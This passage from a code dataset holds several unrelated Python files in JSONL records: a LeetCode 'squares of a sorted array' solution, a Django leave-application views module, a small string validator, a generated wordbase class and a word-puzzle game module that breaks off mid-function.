","sub_path":"curriculo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"469448036","text":"class Solution:\n def sortedSquares(self, nums: List[int]) -> List[int]:\n n = len(nums)\n res = [0] * n\n left, right = 0, n - 1\n\n while (right - left >= 0):\n if (abs(nums[left]) > abs(nums[right])):\n res[right - left] = nums[left] ** 2\n left += 1\n else:\n res[right - left] = nums[right] ** 2\n right -= 1\n\n return res\n\n # n = len(nums)\n\n # res = []\n\n # iOfNumClosestToZero = 0\n\n # i = 1\n # while (i < n and abs(nums[i]) <= abs(nums[i-1])):\n # iOfNumClosestToZero = i\n # i += 1\n\n # res.append(nums[iOfNumClosestToZero] ** 2)\n # left = iOfNumClosestToZero - 1\n # right = iOfNumClosestToZero + 1\n\n # for _ in range(n - 1):\n # if (left < 0):\n # res.append(nums[right] ** 2)\n # right += 1\n # elif (right > n - 1):\n # res.append(nums[left] ** 2)\n # left -= 1\n # else:\n # if (abs(nums[left]) > abs(nums[right])):\n # res.append(nums[right] ** 2)\n # right += 1\n # else:\n # res.append(nums[left] ** 2)\n # left -= 1\n\n # return res\n","sub_path":"LeetCode/977. Squares of a Sorted Array.py","file_name":"977. 
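# [Illustrative addition - not part of the original dataset records.]
# judge_anagram.py above compares sorted character lists, which is O(n log n).
# An equivalent counting check runs in O(n); the helper name is made up:
from collections import Counter

def is_anagram(s1: str, s2: str) -> bool:
    # Two strings are anagrams iff every character occurs the same number of times.
    return Counter(s1) == Counter(s2)

assert is_anagram("hoge", "geho")
assert not is_anagram("hoge", "hogo")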
Squares of a Sorted Array.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"52087363","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.views import View\nfrom django.http import HttpResponse, Http404, JsonResponse\nfrom leave_application.forms import (FacultyLeaveForm,\n StaffLeaveForm,\n StudentLeaveForm,)\n\nfrom user_app.models import Administration, Replacement, ExtraInfo\nfrom leave_application.models import (Leave, CurrentLeaveRequest,\n LeaveRequest, LeavesCount,\n LeaveMigration,)\nfrom django.contrib.auth.models import User\n\nfrom eis.views import render_to_pdf\n\nfrom leave_application.helpers import FormData, get_object_or_none, count_work_days\nfrom django.db.models import Q\nfrom django.db import transaction\nimport datetime\nimport json\nfrom django.contrib.auth.decorators import login_required\n\n\nclass LeaveView(View):\n\n def get(self, request):\n cake = request.GET.get('cake')\n curr_year = datetime.date.today().year\n if not cake:\n leaves_count = LeavesCount.objects.get(user=request.user, year=curr_year)\n applications = GetApplications.get_reps(request)\n message = request.GET.get('message', None)\n leave_id = request.GET.get('leave_id', None)\n form = ApplyLeave.get_form(request) if not message else None\n received_requests = GetApplications.get_count(request)\n context = {\n 'form': form,\n 'leaves_count': leaves_count,\n 'message': message,\n 'show_approve': received_requests,\n 'leave_id': leave_id\n }\n context.update(applications)\n return render(request, 'fusion/leaveModule0/leave.html', context)\n\n elif cake == 'form':\n form = ApplyLeave.get_form(request)\n leaves_count = LeavesCount.objects.get(user=request.user, year=curr_year)\n context = {\n 'form': form,\n 'leaves_count': leaves_count,\n }\n return render(request, 'fusion/leaveModule0/leaveapplicationform.html', context)\n\n elif cake == 'status':\n user_leaves = Leave.objects.filter(applicant=request.user)\n\n context = {\n 'user_leaves': user_leaves\n }\n\n return render(request, 'fusion/leaveModule0/leavestatus.html', context)\n\n elif cake == 'approve':\n context = GetApplications.get_to_approve(request)\n return render(request, 'fusion/leaveModule0/leaveapprove.html', context)\n\n elif cake == 'detail':\n pk = request.GET.get('pk')\n leave = Leave.objects.get(pk=pk)\n\n return render(request, 'fusion/leaveModule0/details.html', {'leave': leave})\n\n else:\n return HttpResponse('You can\\'t see this page.')\n\nclass ApplyLeave(View):\n \"\"\"\n A Class Based View which handles user applying for leave\n \"\"\"\n def get(self, request):\n \"\"\"\n view to handle get request to /leave/apply\n \"\"\"\n # TODO: Check if leave not rejected or accepted and leave instance belongs to user\n # TODO: Take another value as action so that action can specify edit or delete with same\n return redirect('/leave/')\n\n def post(self, request):\n \"\"\"\n view to handle post request to /leave/apply\n \"\"\"\n form = ApplyLeave.get_form(request)\n if form.is_valid():\n type_of_leave = form.cleaned_data.get('type_of_leave', 'casual')\n acad_done = False if form.cleaned_data.get('acad_rep', False) else True\n admin_done = False if form.cleaned_data.get('admin_rep', False) else True\n academic_replacement = get_object_or_none(User, username=form.cleaned_data.get('acad_rep'))\n administrative_replacement = get_object_or_none(User,\n username=form.cleaned_data.get('admin_rep'))\n try:\n 
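# [Illustrative addition - not part of the original dataset records.]
# The 977.py record above fills the result array from the back with a
# two-pointer scan. A standalone copy of that approach, checked against the
# naive sort-based answer on random inputs:
import random

def sorted_squares(nums):
    n = len(nums)
    res = [0] * n
    left, right = 0, n - 1
    while right >= left:
        # The larger absolute value owns the next slot from the back.
        if abs(nums[left]) > abs(nums[right]):
            res[right - left] = nums[left] ** 2
            left += 1
        else:
            res[right - left] = nums[right] ** 2
            right -= 1
    return res

for _ in range(100):
    nums = sorted(random.sample(range(-50, 50), random.randint(1, 20)))
    assert sorted_squares(nums) == sorted(x * x for x in nums)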
leave_obj = Leave.objects.create(\n applicant = request.user,\n type_of_leave = type_of_leave,\n academic_replacement = academic_replacement,\n administrative_replacement = administrative_replacement,\n purpose = form.cleaned_data['purpose'],\n acad_done = acad_done,\n admin_done = admin_done,\n leave_address = form.cleaned_data.get('leave_address', ''),\n start_date = form.cleaned_data['start_date'],\n station_start_date = form.cleaned_data.get('station_start_date'),\n station_end_date = form.cleaned_data.get('station_end_date'),\n end_date = form.cleaned_data['end_date'],\n station = form.cleaned_data.get('station_leave'),\n )\n\n except Exception as e:\n return render(request,\n 'leave_application/apply_for_leave.html',\n {'form': form, 'message': 'Failed'})\n\n return redirect('/leave/?message=success&leave_id={}'.format(leave_obj.id))\n\n else:\n context = {'form': form, 'title': 'Leave', 'action':'Apply'}\n year = datetime.date.today().year\n leaves_count = LeavesCount.objects.get(user=request.user, year=year)\n context['leaves_count'] = leaves_count\n context.update(GetApplications.get_reps(request))\n return render(request, 'fusion/leaveModule0/leave.html', context)\n\n @classmethod\n def get_user_type(cls, request):\n return request.user.extrainfo.user_type\n\n @classmethod\n def get_form(cls, request):\n\n user_type = cls.get_user_type(request)\n\n if user_type == 'faculty':\n form = cls.get_form_object(FacultyLeaveForm, request)\n elif user_type == 'staff':\n form = cls.get_form_object(StaffLeaveForm, request)\n else:\n form = cls.get_form_object(StudentLeaveForm, request)\n\n return form\n\n @classmethod\n def get_form_object(ccls, cls, request):\n\n if request.method == 'GET':\n return cls(initial={}, user=request.user)\n else:\n return cls(request.POST, user=request.user)\n\n\nclass ProcessRequest(View):\n\n def post(self, request, id):\n leave_request = get_object_or_404(CurrentLeaveRequest, id=id)\n\n do = request.POST.get('do')\n\n response = JsonResponse({'response': 'Failed'}, status=400)\n\n rep_user = get_object_or_none(Replacement, replacee=leave_request.requested_from,\n replacement_type='administrative')\n if rep_user:\n rep_user = rep_user.replacer\n\n if request.user in [leave_request.requested_from, rep_user] \\\n and do in ['accept', 'reject', 'forward']:\n\n response = getattr(self, do)(request, leave_request) or response\n\n return response\n\n\n def accept(self, request, leave_request):\n type_of_leave = leave_request.leave.type_of_leave\n sanc_auth = leave_request.applicant.extrainfo.sanctioning_authority\n sanc_officer = leave_request.applicant.extrainfo.sanctioning_officer\n remark = request.POST.get('remark', '')\n response = JsonResponse({'response': 'ok'}, status=200)\n\n if leave_request.permission in ['academic', 'admin']:\n\n if leave_request.permission == 'academic':\n leave_request.leave.acad_done = True\n else:\n leave_request.leave.admin_done = True\n\n leave_request.leave.save()\n leave_request = self.create_leave_request(leave_request, False, accept=True, remark=remark)\n\n if leave_request.leave.replacement_confirm and leave_request.leave.status == 'processing':\n position = leave_request.applicant.extrainfo.sanctioning_authority\n next_user = ExtraInfo.objects.filter(designation=position).first().user\n CurrentLeaveRequest.objects.create(\n applicant = leave_request.applicant,\n requested_from = next_user,\n permission = 'sanc_auth',\n position = position,\n leave = leave_request.leave,\n )\n\n elif sanc_auth == sanc_officer or 
leave_request.permission == 'sanc_officer':\n leave_request = self.create_leave_request(leave_request, True, accept=True, remark=remark)\n leave_request.leave.status = 'accepted'\n leave_request.leave.save()\n\n elif leave_request.permission == 'sanc_auth':\n if type_of_leave in ['casual', 'restricted']:\n leave_request = self.create_leave_request(leave_request, True, accept=True, remark=remark)\n else:\n response = None\n\n return response\n\n def reject(self, request, leave_request):\n remark = request.POST.get('remark', '')\n\n type_of_leave = leave_request.leave.type_of_leave\n response = JsonResponse({'response': 'ok',}, status=200)\n sanc_auth = leave_request.applicant.extrainfo.sanctioning_authority\n sanc_officer = leave_request.applicant.extrainfo.sanctioning_officer\n\n condition = sanc_officer == sanc_auth\n\n if not leave_request.leave.replacement_confirm or leave_request.permission == 'sanc_officer' \\\n or condition:\n leave_request = self.create_leave_request(leave_request, True, accept=False, remark=remark)\n list(map(lambda x: x.delete(), leave_request.leave.cur_requests.all()))\n\n elif leave_request.permission == 'sanc_auth':\n if type_of_leave in ['casual', 'restricted']:\n leave_request = self.create_leave_request(leave_request, True, accept=False, remark=remark)\n else:\n response = None\n else:\n response = None\n return response\n\n def forward(self, request, leave_request):\n\n remark = request.POST.get('remark', '')\n type_of_leave = leave_request.leave.type_of_leave\n\n response = JsonResponse({'response': 'ok',}, status=200)\n\n if leave_request.permission == 'sanc_auth' and \\\n type_of_leave not in ['casual', 'restricted']:\n\n leave_request = self.create_leave_request(leave_request, False, accept=False, remark=remark)\n\n if leave_request.leave.status == 'processing':\n position = leave_request.applicant.extrainfo.sanctioning_officer\n\n next_user = ExtraInfo.objects.filter(designation=position).first().user\n\n CurrentLeaveRequest.objects.create(\n applicant = leave_request.applicant,\n requested_from = next_user,\n position = position,\n leave = leave_request.leave,\n permission = 'sanc_officer',\n )\n else:\n response = None\n\n return response\n\n\n\n @transaction.atomic\n def create_leave_request(self, cur_leave_request, final, accept=False, remark=''):\n if cur_leave_request.leave.type_of_leave not in ['casual', 'restricted'] and \\\n cur_leave_request.permission == 'sanc_auth':\n status = True\n else:\n status = accept\n\n leave_request = LeaveRequest.objects.create(\n leave = cur_leave_request.leave,\n applicant = cur_leave_request.applicant,\n requested_from = cur_leave_request.requested_from,\n remark = remark,\n permission = cur_leave_request.permission,\n position = cur_leave_request.position,\n status = status,\n )\n\n if not accept and final:\n cur_leave_request.leave.status = 'rejected'\n elif final:\n curr_year = datetime.date.today().year\n start_date = cur_leave_request.leave.start_date\n end_date = cur_leave_request.leave.end_date\n if curr_year == start_date.year and curr_year == end_date.year:\n count = LeavesCount.objects.get(user=cur_leave_request.applicant, year=curr_year)\n\n remain = getattr(count, cur_leave_request.leave.type_of_leave)\n required_leaves = cur_leave_request.leave.count_work_days\n\n if remain < required_leaves:\n cur_leave_request.leave.status = 'rejected'\n else:\n setattr(count, cur_leave_request.leave.type_of_leave,\n remain - required_leaves)\n count.save()\n self.create_migration(cur_leave_request.leave)\n 
cur_leave_request.leave.status = 'accepted'\n            elif curr_year == start_date.year and end_date.year == curr_year + 1:\n                final_date = datetime.date(curr_year, 12, 31)\n\n                days_in_curr_year = count_work_days(start_date, final_date)\n                final_date += datetime.timedelta(days=1)\n                days_in_next_year = count_work_days(final_date, end_date)\n                curr_count = LeavesCount.objects.get(user=cur_leave_request.applicant,\n                                                     year=start_date.year)\n                next_count = LeavesCount.objects.get(user=cur_leave_request.applicant,\n                                                     year=end_date.year)\n\n                curr_remaining = getattr(curr_count, cur_leave_request.leave.type_of_leave)\n                next_remaining = getattr(next_count, cur_leave_request.leave.type_of_leave)\n\n                if curr_remaining >= days_in_curr_year and next_remaining >= days_in_next_year:\n                    setattr(curr_count, cur_leave_request.leave.type_of_leave,\n                            curr_remaining - days_in_curr_year)\n                    curr_count.save()\n                    setattr(next_count, cur_leave_request.leave.type_of_leave,\n                            next_remaining - days_in_next_year)\n                    next_count.save()\n                    self.create_migration(cur_leave_request.leave)\n                    cur_leave_request.leave.status = 'accepted'\n                else:\n                    cur_leave_request.leave.status = 'rejected'\n\n            elif start_date.year == curr_year + 1 and end_date.year == curr_year + 1:\n                count = LeavesCount.objects.get(user=cur_leave_request.applicant, year=curr_year+1)\n\n                remain = getattr(count, cur_leave_request.leave.type_of_leave)\n                required_leaves = cur_leave_request.leave.count_work_days\n                if remain < required_leaves:\n                    cur_leave_request.leave.status = 'rejected'\n                else:\n                    setattr(count, cur_leave_request.leave.type_of_leave,\n                            remain - required_leaves)\n                    count.save()\n                    self.create_migration(cur_leave_request.leave)\n                    cur_leave_request.leave.status = 'accepted'\n\n\n        cur_leave_request.leave.save()\n        cur_leave_request.delete()\n        return leave_request\n\n\n\n    def process_student_request(self, sanc_auth, leave_request, remark, process):\n\n        outcome = 'accepted' if process else 'rejected'\n        new_leave_request = LeaveRequest.objects.create(\n            applicant = leave_request.applicant,\n            requested_from = leave_request.requested_from,\n            position = leave_request.position,\n            leave = leave_request.leave,\n            status = process,\n            remark = remark,\n        )\n        new_leave_request.leave.status = outcome\n        new_leave_request.leave.save()\n        leave_request.delete()\n        return JsonResponse({'response': 'ok'}, status=200)\n\n    @transaction.atomic\n    def create_migration(self, leave):\n\n        if leave.start_date <= datetime.date.today():\n\n            if leave.applicant.extrainfo.user_type == 'faculty':\n                r1 = Replacement.objects.create(\n                    replacee = leave.applicant,\n                    replacer = leave.academic_replacement,\n                    replacement_type = 'academic',\n                )\n                LeaveMigration.objects.create(\n                    replacee = leave.applicant,\n                    replacer = leave.academic_replacement,\n                    rep = r1,\n                    start_date = leave.end_date + datetime.timedelta(days=1),\n                    type = 'del',\n                )\n\n                r2 = Replacement.objects.create(\n                    replacee = leave.applicant,\n                    replacer = leave.administrative_replacement,\n                    replacement_type = 'administrative',\n                )\n                LeaveMigration.objects.create(\n                    replacee = leave.applicant,\n                    replacer = leave.administrative_replacement,\n                    rep = r2,\n                    start_date = leave.end_date + datetime.timedelta(days=1),\n                    type = 'del',\n                )\n\n        else:\n            if leave.applicant.extrainfo.user_type == 'faculty':\n                LeaveMigration.objects.create(\n                    type = 'add',\n                    replacee = leave.applicant,\n                    replacer = leave.academic_replacement,\n                    start_date = leave.start_date,\n                    end_date = leave.end_date,\n                    replacement_type = 'academic',\n                )\n\n                LeaveMigration.objects.create(\n                    type = 
'add',\n replacee = leave.applicant,\n replacer = leave.administrative_replacement,\n start_date = leave.start_date,\n end_date = leave.end_date,\n replacement_type = 'administrative',\n )\n\n def is_problematic(self, leave):\n #TODO: Add automatic hadling of outdated or problematic leave requests\n pass\n\nclass GetApplications():\n\n @classmethod\n def get_to_approve(cls, request):\n processed_request_list = LeaveRequest.objects.filter(requested_from=request.user).order_by('-id')\n\n replacements = Replacement.objects.filter(Q(replacer=request.user)\n & Q(replacement_type='administrative'))\n reqs = CurrentLeaveRequest.objects.filter(Q(requested_from=request.user)\n & ~(Q(permission='academic')\n | Q(permission='admin')))\n request_list = [cls.should_forward(request, q_obj) for q_obj in reqs]\n for replacement in replacements:\n replacee = replacement.replacee\n reqs = CurrentLeaveRequest.objects.filter((Q(requested_from=request.user)\n | Q(requested_from=replacee))\n & ~(Q(permission='academic')\n | Q(permission='admin')))\n request_list += [cls.should_forward(request, q_obj) for q_obj in reqs]\n\n\n context = {\n 'processed_request_list': processed_request_list,\n 'request_list': request_list,\n }\n return context\n\n @classmethod\n def get_count(cls, request):\n processed_request_list_exists = LeaveRequest.objects.filter(requested_from=request.user).exists()\n\n if processed_request_list_exists:\n return True\n\n replacements = Replacement.objects.filter(Q(replacer=request.user)\n & Q(replacement_type='administrative'))\n reqs = CurrentLeaveRequest.objects.filter(Q(requested_from=request.user)\n & ~(Q(permission='academic')\n | Q(permission='admin'))).exists()\n if reqs:\n return reqs\n\n for replacement in replacements:\n replacee = replacement.replacee\n reqs = CurrentLeaveRequest.objects.filter((Q(requested_from=request.user)\n | Q(requested_from=replacee))\n & ~(Q(permission='academic')\n | Q(permission='admin'))).exists()\n\n if reqs:\n return True\n\n return False\n\n @classmethod\n def get_reps(cls, request):\n rep_requests = CurrentLeaveRequest.objects.filter(Q(requested_from=request.user) &\n (Q(permission='academic') | Q(permission='admin')))\n return {'rep_requests': rep_requests}\n\n @classmethod\n def should_forward(cls, request, query_obj):\n\n obj = FormData(request, query_obj)\n sanc_auth = query_obj.applicant.extrainfo.sanctioning_authority\n sanc_officer = query_obj.applicant.extrainfo.sanctioning_officer\n type_of_leave = query_obj.leave.type_of_leave\n\n designation = query_obj.requested_from.extrainfo.designation\n if sanc_auth == sanc_officer:\n obj.forward = False\n elif (sanc_auth == designation and type_of_leave not in ['casual', 'restricted']) \\\n and query_obj.permission not in ['academic', 'admin']:\n\n obj.forward = True\n\n else:\n obj.forward = False\n return obj\n\n\n@login_required(login_url='/accounts/login')\ndef generate_pdf(request):\n id = request.GET.get('id', None)\n if not id:\n return Http404\n\n leave = get_object_or_404(Leave, pk=id)\n\n if not leave or leave.applicant != request.user:\n return Http404\n date = datetime.date.today()\n # return render(request, 'fusion/leaveModule0/generatePDF.html', {'leave': leave, 'date': date})\n return render_to_pdf('fusion/leaveModule0/generatePDF.html', {'leave': leave, 'request': request, 'date': date})\n\n\nclass GetLeaves(View):\n\n def get(self, request):\n leave_list = Leave.objects.filter(applicant=request.user).order_by('-id')\n count = len(list(leave_list))\n return render(request, 
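# [Illustrative addition - not part of the original dataset record.]
# create_leave_request() above charges a leave that crosses Dec 31 against two
# yearly LeavesCount rows. A pure-Python sketch of that split; count_work_days
# is project-local, so plain calendar days are counted here instead:
import datetime

def split_by_year(start, end):
    """Return {year: inclusive day count} for a leave spanning start..end."""
    days = {}
    cur = start
    while cur <= end:
        year_end = min(end, datetime.date(cur.year, 12, 31))
        days[cur.year] = (year_end - cur).days + 1
        cur = year_end + datetime.timedelta(days=1)
    return days

assert split_by_year(datetime.date(2020, 12, 30), datetime.date(2021, 1, 2)) == {2020: 2, 2021: 2}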
'leave_application/get_leaves.html', {'leaves':leave_list,\n 'count':count,\n 'title':'Leave',\n 'action':'ViewLeaves'})\n","sub_path":"leave_application/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":22724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"355633745","text":"# author: ZumbiPy\r\n# E-mail: zumbipy@gmail.com\r\n\"\"\"\r\nExercício 11\r\n\"\"\"\r\n\r\n\r\ndef valida_texto(text, max, min):\r\n char_t = len(text)\r\n if char_t >= max or char_t <= min:\r\n return False\r\n else:\r\n return True\r\n","sub_path":"Capitulo_08/exercicio-11.py","file_name":"exercicio-11.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"46744872","text":"\n\nfrom xai.brain.wordbase.nouns._frippery import _FRIPPERY\n\n#calss header\nclass _FRIPPERIES(_FRIPPERY, ):\n\tdef __init__(self,): \n\t\t_FRIPPERY.__init__(self)\n\t\tself.name = \"FRIPPERIES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"frippery\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_fripperies.py","file_name":"_fripperies.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"318889391","text":"\"\"\"Phrase Puzzler main program.\"\"\"\n\nimport random\nfrom typing import List\n\nfrom constants import (VOWEL_PRICE, CONSONANT_BONUS, PLAYER_ONE,\n PLAYER_TWO, CONSONANT, VOWEL, SOLVE, QUIT,\n HUMAN, HUMAN_HUMAN, HUMAN_COMPUTER, EASY, HARD,\n ALL_CONSONANTS, ALL_VOWELS,\n PRIORITY_CONSONANTS, HIDDEN)\n\nimport puzzler_functions as pf\n\n\n################################ The Game: #################################\ndef play_game(puzzle: str, puzzles: List[str], game_type: str) -> None:\n \"\"\"Play the game!\"\"\"\n\n view = make_view(puzzle)\n consonants, vowels = ALL_CONSONANTS, ALL_VOWELS\n player_one_score, player_two_score = 0, 0\n current_player = PLAYER_ONE\n\n if game_type == HUMAN_COMPUTER:\n difficulty = select_computer_difficulty()\n\n move = ''\n while not pf.is_game_over(puzzle, view, move):\n score = pf.current_player_score(player_one_score,\n player_two_score,\n current_player)\n num_occurrences = 0\n\n display_move_prompt(current_player, score, view)\n\n if pf.is_human(current_player, game_type):\n (move, guess) = human_move(score, consonants, vowels)\n else:\n (move, guess) = computer_move(view, puzzles, difficulty,\n consonants)\n\n if move == QUIT:\n print('You chose to quit the game!')\n winner = 'No winner'\n\n if move == SOLVE:\n if guess == puzzle:\n score = compute_score(puzzle, view, consonants, score)\n view = puzzle\n winner = current_player\n else:\n print(\"The solution '{}' is incorrect. 
Keep playing!\"\n .format(guess))\n\n else: # guess vowel or consonant\n view = update_view(puzzle, view, guess)\n num_occurrences = puzzle.count(guess)\n score = pf.calculate_score(score, num_occurrences, move)\n\n consonants = pf.erase(consonants, consonants.find(guess))\n vowels = pf.erase(vowels, vowels.find(guess))\n\n winner = current_player\n\n print(\"{} guesses {}, which occurs {} time(s) in the puzzle.\"\n .format(current_player, guess, num_occurrences))\n print(\"{}'s score is now {}.\".format(current_player, score))\n\n if current_player == PLAYER_ONE:\n player_one_score = score\n else:\n player_two_score = score\n current_player = pf.next_player(\n current_player, num_occurrences, game_type)\n\n # The game is over.\n display_outcome(winner, puzzle, game_type, player_one_score,\n player_two_score)\n\n\ndef update_view(puzzle: str, view: str, guess: str) -> str:\n \"\"\"Return a new view of puzzle: a view in which each occurrence of\n guessed_letter in puzzle is revealed.\n\n >>> update_view('apple', '^^^le', 'a')\n 'a^^le'\n >>> update_view('apple', '^^^le', 'p')\n '^pple'\n >>> update_view('apple', '^^^le', 'z')\n '^^^le'\n\n \"\"\"\n\n new_view = ''\n for index in range(len(puzzle)):\n new_view += pf.update_char_view(puzzle, view, index, guess)\n return new_view\n\n\ndef compute_score(puzzle: str, view: str, unguessed_consonants: str,\n current_score: int) -> int:\n \"\"\"Return the final score, calculated by adding\n constants.CONSONANT_BONUS points to current_score for each\n occurrence of each letter in unguessed_consonants in puzzle that\n appears as consonants.HIDDEN in view.\n\n >>> compute_score('apple pies', '^pple p^es', 'dfkpqstz', 0)\n 0\n >>> compute_score('apple pies', '^^^le ^^e^', 'dfkpqstz', 0)\n 8\n\n \"\"\"\n\n final_score = current_score\n for letter in unguessed_consonants:\n if pf.is_bonus_letter(letter, puzzle, view):\n final_score += CONSONANT_BONUS * puzzle.count(letter)\n return final_score\n\n\n########################## Game Play: Computer Moves #######################\ndef computer_move(view: str, puzzles: List[str], difficulty: str,\n consonants: str) -> (str, str):\n \"\"\"Return the computer's next move:\n (constants.SOLVE, solution-guess) or (constants.CONSONANT, letter-guess)\n\n If difficulty is constants.HARD, the computer chooses to solve if\n at least half of the letters in view are revealed (not\n constants.HIDDEN). Otherwise, the computer opts to guess a\n consonant.\n\n \"\"\"\n\n if pf.computer_chooses_solve(view, difficulty, consonants):\n move = SOLVE\n guess = get_match(view, puzzles)\n print('\\tI choose to solve: {}.'.format(guess))\n else:\n move = CONSONANT\n guess = computer_guess_letter(consonants, difficulty)\n print('\\tI choose to guess letter: {}.'.format(guess))\n return move, guess\n\n\ndef get_match(view: str, puzzles: List[str]) -> str:\n \"\"\"Return a puzzle from puzzles that could be represented by view. 
If\n no such puzzle exists, return the empty string.\n\n >>> get_match('^^^ ro^k^', ['abc', 'csc rocks', 'math is cool'])\n 'csc rocks'\n >>> get_match('^^^ ro^ks', ['abc', 'csc rocks', 'math is cool'])\n ''\n \"\"\"\n\n for puzzle in puzzles:\n if is_match(puzzle, view):\n return puzzle\n return ''\n\n\ndef is_match(puzzle: str, view: str) -> bool:\n \"\"\"Return True if and only if view is a valid puzzle-view of puzzle.\n\n >>> is_match('', '')\n True\n >>> is_match('a', 'a')\n True\n >>> is_match('bb', 'b^')\n False\n >>> is_match('abcde', 'ab^^e')\n True\n >>> is_match('axyzb', 'ab^^e')\n False\n >>> is_match('abcdefg', 'ab^^e')\n False\n\n \"\"\"\n\n if len(puzzle) != len(view):\n return False\n\n for index in range(len(puzzle)):\n if (puzzle[index] != view[index] and\n not pf.is_hidden(index, puzzle, view)):\n return False\n return True\n\n\ndef computer_guess_letter(consonants: str, difficulty: str) -> str:\n \"\"\"Return a letter from consonants. If difficulty is constants.EASY,\n select the letter randomly. If difficulty is constants.HARD,\n select the first letter from constants.PRIORITY_CONSONANTS that\n occurs in consonants.\n\n len(consonants) > 0;\n at least one character in consonants is in consonants.PRIORITY_CONSONANTS.\n difficulty in (constants.EASY, constants.HARD)\n\n >>> computer_guess_letter('bcdfg', 'H')\n 'd'\n\n \"\"\"\n\n if difficulty == HARD:\n for consonant in PRIORITY_CONSONANTS:\n if consonant in consonants:\n return consonant\n return random.choice(consonants)\n\n\n########################## Game Play: User Interaction: ####################\ndef human_move(player_score: int, consonants: str, vowels: str) -> tuple:\n \"\"\"Ask the user to make a complete move:\n\n 1) Repeatedly ask to choose a move (constants.CONSONANT,\n constants.VOWEL, constants.SOLVE, or constants.QUIT), until a\n valid input is entered.\n\n 2) Upon receiving constants.VOWEL or constants.CONSONANT,\n repeatedly prompt to choose a corresponding letter, until a valid\n input is entered.\n\n 3) Upon receiving constants.SOLVE, prompt for a solution word.\n\n Return the user input guess, or the empty string is the first\n choice was constants.QUIT.\n\n \"\"\"\n\n move = select_move(player_score, consonants, vowels)\n\n if move == QUIT:\n guess = ''\n if move == VOWEL:\n guess = select_letter(vowels)\n if move == CONSONANT:\n guess = select_letter(consonants)\n if move == SOLVE:\n guess = input('Input your solution guess: ')\n\n return (move, guess)\n\n\ndef select_move(score: int, consonants: str, vowels: str) -> str:\n \"\"\"Repeatedly prompt current_player to choose a move until a valid\n selection is made. Return the selected move. Move validity is\n defined by is_valid_move(selected-move-type, score, consonants,\n vowels).\n\n (Note: Docstring examples not given since result depends on input\n data.)\n\n \"\"\"\n\n prompt = make_move_prompt()\n\n move = input(prompt)\n while not is_valid_move(move.strip(), score, consonants, vowels):\n move = input(prompt)\n\n return move.strip()\n\n\ndef select_letter(letters: str) -> str:\n \"\"\"Repeatedly prompt the user for a letter, until a valid input is\n received. Return the letter. 
Valid options are characters from\n letters.\n\n (Note: Docstring examples not given since result depends on input\n data.)\n\n \"\"\"\n\n prompt = 'Choose a letter from [{}]: '.format(\n ','.join(['{}'] * len(letters)))\n valid_options = tuple(letters)\n return prompt_for_selection(prompt, valid_options)\n\n\ndef prompt_for_selection(prompt_format: str, valid_options: tuple) -> str:\n \"\"\"Repeatedly ask the user for a selection, until one of valid_options\n is received. The user prompt is created as\n prompt_format.format(valid_option). Return the user input with\n leading and trailing whitespace removed.\n\n (Note: Docstring examples not given since result depends on input\n data.)\n\n \"\"\"\n\n prompt = prompt_format.format(*valid_options)\n\n selection = input(prompt)\n while selection.strip() not in valid_options:\n selection = input('Invalid choice.\\n{}'.format(prompt))\n\n return selection.strip()\n\n\ndef display_move_prompt(current_player: str, player_score: int,\n view: str) -> None:\n \"\"\"Display a prompt for the player to select the next move.\"\"\"\n\n print('=' * 50)\n print('{}, it is your turn. You have {} points.'.format(\n current_player, player_score))\n print('\\n' + view + '\\n')\n\n\ndef make_move_prompt() -> str:\n \"\"\"Return a prompt for the player to select the next move.\"\"\"\n\n prompt = '''Select move type:\n [{}] - Vowel,\n [{}] - Consonant,\n [{}] - Solve,\n [{}] - Quit.\\n'''.format(VOWEL, CONSONANT, SOLVE, QUIT)\n\n return prompt\n\n\ndef is_valid_move(move: str, score: int, consonants: str, vowels: str) -> bool:\n \"\"\"Return whether move is valid. If invalid, print an explanatory\n message. A move is valid when:\n\n 1) move is one of constants.CONSONANT, constants.VOWEL,\n constants.SOLVE, or constants.QUIT;\n\n 2) If move is constants.VOWEL, score is high enough to buy a\n vowel(at least constants.VOWEL_PRICE), and vowels has at least\n one character.\n\n 3) If move is constants.CONSONANT, consonants has at least\n one character.\n\n >>> is_valid_move('X', 0, '', '')\n Valid moves are: C, V, S, and Q.\n False\n >>> is_valid_move('Q', 0, '', '')\n True\n >>> is_valid_move('S', 42, 'bdfrt', 'aeui')\n True\n >>> is_valid_move('C', 2, 'bcdfghjklmnpqstvwxyz', 'aeiou')\n True\n >>> is_valid_move('C', 2, '', 'aeiou')\n You do not have any more consonants to guess!\n False\n >>> is_valid_move('V', 1, 'bcdfghjklmnpqstvwxyz', 'aeiou')\n True\n >>> is_valid_move('V', 0, 'bcdfghjklmnpqstvwxyz', 'aeiou')\n You do not have enough points to reveal a vowel. Vowels cost 1 point(s).\n False\n >>> is_valid_move('V', 42, 'bcdfghjklmnpqstvwxyz', '')\n You do not have any more vowels to guess!\n False\n\n \"\"\"\n\n if move not in (CONSONANT, VOWEL, SOLVE, QUIT):\n print('Valid moves are: {}, {}, {}, and {}.'.format(\n CONSONANT, VOWEL, SOLVE, QUIT))\n return False\n\n if move == VOWEL and score < VOWEL_PRICE:\n print('You do not have enough points to reveal a vowel. '\n 'Vowels cost {} point(s).'.format(VOWEL_PRICE))\n return False\n\n if move == VOWEL and vowels == '':\n print('You do not have any more vowels to guess!')\n return False\n\n if move == CONSONANT and consonants == '':\n print('You do not have any more consonants to guess!')\n return False\n\n return True\n\n\n############################# Game Setup: #############################\ndef select_game_type() -> str:\n \"\"\"Repeatedly prompt the user for game type, until a valid input is\n received. Return the game type. 
